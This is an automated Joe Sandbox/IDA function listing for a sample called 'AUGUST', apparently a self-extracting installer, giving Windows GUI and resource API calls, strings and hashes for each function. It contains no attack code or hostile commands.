Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
API String ID: 2725485552-3187639848
Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D

Function 00402DC0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
GetWindowLongW.USER32(?,000000F0), ref: 00402DF3

Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB

Part of subcall function 00401A85: CharUpperW.USER32(?,7622E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF

??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
GetParent.USER32(?), ref: 00402E2E
LoadLibraryA.KERNEL32(riched20), ref: 00402E42
GetMenu.USER32(?), ref: 00402E55
SetThreadLocale.KERNEL32(00000419), ref: 00402E62
CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
DestroyWindow.USER32(?), ref: 00402EA3
SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
GetSysColor.USER32(0000000F), ref: 00402EBC
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02

Strings

{\rtf, xrefs: 00402E09
RichEdit20W, xrefs: 00402E8C
riched20, xrefs: 00402E3D
STATIC, xrefs: 00402DDD

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
String ID: RichEdit20W$STATIC$riched20${\rtf
API String ID: 1731037045-2281146334
Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68

Function 00401CC8 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 00401CD4
GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
GetObjectW.GDI32(?,00000018,?), ref: 00401D28
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
CreateCompatibleDC.GDI32(?), ref: 00401D4B
CreateCompatibleDC.GDI32(?), ref: 00401D52
SelectObject.GDI32(00000000,?), ref: 00401D60
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
SelectObject.GDI32(00000000,00000000), ref: 00401D76
SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
SelectObject.GDI32(00000000,?), ref: 00401DB3
SelectObject.GDI32(00000000,?), ref: 00401DB9
DeleteDC.GDI32(00000000), ref: 00401DC2
DeleteDC.GDI32(00000000), ref: 00401DC5
ReleaseDC.USER32(00000000,?), ref: 00401DCC
ReleaseDC.USER32(00000000,?), ref: 00401DDB
CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
String ID:
API String ID: 3462224810-0
Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64

Function 00401DF3 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00401E05
lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
GetMenu.USER32(?), ref: 00401E44

Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41

GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
CoInitialize.OLE32(00000000), ref: 00401E8C
CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
GlobalFree.KERNEL32(00000000), ref: 00401ECD

Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC

GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
GlobalFree.KERNEL32(00000000), ref: 00401F3A

Strings

IMAGES, xrefs: 00401E4E
STATIC, xrefs: 00401E13

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
String ID: IMAGES$STATIC
API String ID: 4202116410-1168396491
Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68

Function 0040813D Relevance: 27.1, APIs: 18, Instructions: 147windowcomtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950

GetDlgItem.USER32(?,000004B8), ref: 0040816A
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
GetDlgItem.USER32(?,000004B5), ref: 004081C0
GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
GetDlgItem.USER32(?,000004B5), ref: 004081D5
SetWindowLongW.USER32(00000000), ref: 004081D8
GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
GetDlgItem.USER32(?,000004B4), ref: 0040821A
SetFocus.USER32(00000000), ref: 0040821D
SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
GetDlgItem.USER32(?,00000002), ref: 00408294
IsWindow.USER32(00000000), ref: 00408297
GetDlgItem.USER32(?,00000002), ref: 004082A7
EnableWindow.USER32(00000000), ref: 004082AA
GetDlgItem.USER32(?,000004B5), ref: 004082BE
ShowWindow.USER32(00000000), ref: 004082C1

Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142

Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53

Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID:
API String ID: 855516470-0
Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C

Function 00403093 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 244stringCOMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
strncmp.MSVCRT ref: 004031F1
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347

Strings

hAA, xrefs: 0040309E
SetEnvironment, xrefs: 0040326B
MiscFlags, xrefs: 004032C0
{\rtf, xrefs: 004031D6, 004031EB
GUIFlags, xrefs: 004032B2

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@$lstrcmpstrncmp
String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
API String ID: 2881732429-172299233
Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59

Function 00406A47 Relevance: 24.3, APIs: 16, Instructions: 270COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 00406A69
GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
GetDlgItem.USER32(?,000004B4), ref: 00406AA5
GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
GetSystemMetrics.USER32(00000010), ref: 00406B0B
GetSystemMetrics.USER32(00000011), ref: 00406B11
GetSystemMetrics.USER32(00000008), ref: 00406B18
GetSystemMetrics.USER32(00000007), ref: 00406B1F
GetParent.USER32(?), ref: 00406B43
GetClientRect.USER32(00000000,?), ref: 00406B55
ClientToScreen.USER32(?,?), ref: 00406B68
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
GetClientRect.USER32(?,?), ref: 00406C55
ClientToScreen.USER32(?,?), ref: 00406B71

Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B

GetSystemMetrics.USER32(00000008), ref: 00406CD6
GetSystemMetrics.USER32(00000007), ref: 00406CDD

Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
String ID:
API String ID: 747815384-0
Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64

Function 00407D06 Relevance: 22.7, APIs: 15, Instructions: 231windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
LoadIconW.USER32(00000000), ref: 00407D33
GetSystemMetrics.USER32(00000032), ref: 00407D43
GetSystemMetrics.USER32(00000031), ref: 00407D48
GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
LoadImageW.USER32(00000000), ref: 00407D54
SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
GetWindow.USER32(?,00000005), ref: 00407E76
GetWindow.USER32(?,00000005), ref: 00407E92
GetWindow.USER32(?,00000005), ref: 00407EAA
GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
LoadIconW.USER32(00000000), ref: 00407F0D
GetDlgItem.USER32(?,000004B1), ref: 00407F28
SendMessageW.USER32(00000000), ref: 00407F2F

Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B

Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
String ID:
API String ID: 1889686859-0
Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF

Function 00406F37 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00406F45
GetWindowLongW.USER32(00000000), ref: 00406F4C
DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
GetSystemMetrics.USER32(00000031), ref: 00406F91
GetSystemMetrics.USER32(00000032), ref: 00406F98
GetWindowDC.USER32(?), ref: 00406FAA
GetWindowRect.USER32(?,?), ref: 00406FB7
DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
ReleaseDC.USER32(?,00000000), ref: 00406FF3

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
String ID:
API String ID: 2586545124-0
Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64

Function 0040677A Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 0040678E
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
GetDlgItem.USER32(?,000004B4), ref: 004067AB
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
GetDlgItem.USER32(?,?), ref: 004067CC
SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
GetDlgItem.USER32(?,?), ref: 004067DD
SetFocus.USER32(00000000,?,000004B4,76230E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ItemMessageSend$Focus
String ID:
API String ID: 3946207451-0
Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28

Function 0040C3D8 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 480COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603

Strings

IA, xrefs: 0040C4D9
IA, xrefs: 0040C65E
IA, xrefs: 0040C74D
IA, xrefs: 0040C66E
IA, xrefs: 0040C4C6
IA, xrefs: 0040C4AF

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd

Similarity

API ID: ??3@
String ID: IA$IA$IA$IA$IA$IA
API String ID: 613200358-3743982587
Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58

Function 004083B6 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 196COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479

Strings

HelpText, xrefs: 00408598
WarningTitle, xrefs: 0040853A
SetEnvironment, xrefs: 004083BC
FinishMessage, xrefs: 00408417, 00408433
BeginPrompt, xrefs: 004084A4, 004084A9
ErrorTitle, xrefs: 00408511

Memory Dump Source

Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

